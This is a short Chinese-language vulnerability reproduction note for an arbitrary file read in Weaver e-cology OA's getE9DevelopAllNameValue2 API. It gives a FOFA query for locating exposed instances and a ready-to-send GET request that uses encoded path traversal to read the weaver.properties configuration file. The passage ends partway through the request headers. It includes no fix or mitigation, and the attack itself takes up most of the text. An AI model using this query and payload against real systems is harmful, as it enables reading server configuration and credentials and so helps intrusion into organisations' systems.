漏洞描述
泛微e-cology依托全新的设计理念,全新的管理思想。为中大型组织创建全新的高效协同办公环境。智能语音办公,简化软件操作界面。身份认证、电子签名、电子签章、数据存证让合同全程数字化。泛微e-cology getE9DevelopAllNameValue2接口存在任意文件读取漏洞,通过该漏洞可以访问任意文件。
受影响版本
- 泛微e-cology
Fofa语法与漏洞编号
app="泛微-OA(e-cology)"
页面信息
cve 漏洞编号
未知
漏洞复现
存在问题的接口
GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,applicat